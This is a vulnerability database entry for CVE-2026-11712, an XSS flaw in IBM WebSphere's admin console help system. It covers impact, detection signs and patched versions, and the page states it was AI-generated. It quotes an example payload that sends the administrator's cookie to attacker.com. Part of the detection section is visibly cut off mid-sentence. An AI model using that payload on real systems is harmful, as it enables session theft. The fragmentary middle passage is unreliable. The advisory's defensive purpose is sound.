
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-11712 is a cross-site scripting (XSS) vulnerability in the administrative console help system of IBM WebSphere Application Server (WAS). It affects WAS Traditional versions 9.0.0.0 through 9.0.5.28 and 8.5.0.0 through 8.5.5.30. The vulnerability was published on June 30, 2026, with patches made available the same day. It carries a CVSS v3.1 base score of 9.3 (Critical) (GitHub Advisory, IBM Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), arising from insufficient sanitization of user-controllable input within the WAS administrative console help system. An unauthenticated remote attacker can inject malicious scripts into the help system content, which are then executed in the browser of an authenticated administrator who views the affected help pages. The attack requires no privileges and low complexity, but does require user interaction (an administrator must view the malicious content). The scope is changed, meaning the injected script executes in the context of the administrator's browser session rather than the vulnerable component itself (GitHub Advisory, IBM Advisory).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the browser of an authenticated WAS administrator, resulting in high confidentiality and integrity impact with no availability impact. An attacker could steal session tokens or credentials, hijack the administrator's session, modify administrative settings, or perform unauthorized administrative actions on behalf of the victim. Because the administrative console controls the entire WAS environment, compromise could extend to deployed applications, server configurations, and potentially connected systems (GitHub Advisory, IBM Advisory).
/ibm/console/help/... or similar paths).<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<script>, javascript:, onerror=, or URL-encoded equivalents; log entries showing administrator sessions performing unexpected configuration changes.server.xml, security.xml) that do not correspond to authorized administrative actions.IBM has released patched versions addressing this vulnerability: upgrade to WAS Traditional 9.0.5.29 or later for the 9.0 branch, and 8.5.5.31 or later for the 8.5 branch (IBM Advisory). As an interim workaround until patching is complete, restrict access to the WAS administrative console to trusted internal networks only using firewall rules or network ACLs, and avoid exposing the console to the internet. Monitor administrator activity and review console access logs for anomalous behavior. Organizations running WAS as part of IBM Business Automation Workflow, IBM Guardium Key Lifecycle Manager, or IBM Cloud Pak for Applications should also apply the respective product-specific security bulletins (IBM BAW Bulletin, IBM Cloud Pak Bulletin).
Security news outlets including GBHackers, CyberSecurityNews, SecurityOnline, and CyberPress covered the vulnerability shortly after disclosure, framing it alongside related WAS path traversal vulnerabilities as a set of critical flaws requiring urgent attention (GBHackers, CyberSecurityNews, SecurityOnline). The vulnerability was also included in The Hacker News' weekly recap, indicating moderate community interest (The Hacker News). No notable individual researcher commentary or threat actor attribution has been publicly reported.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."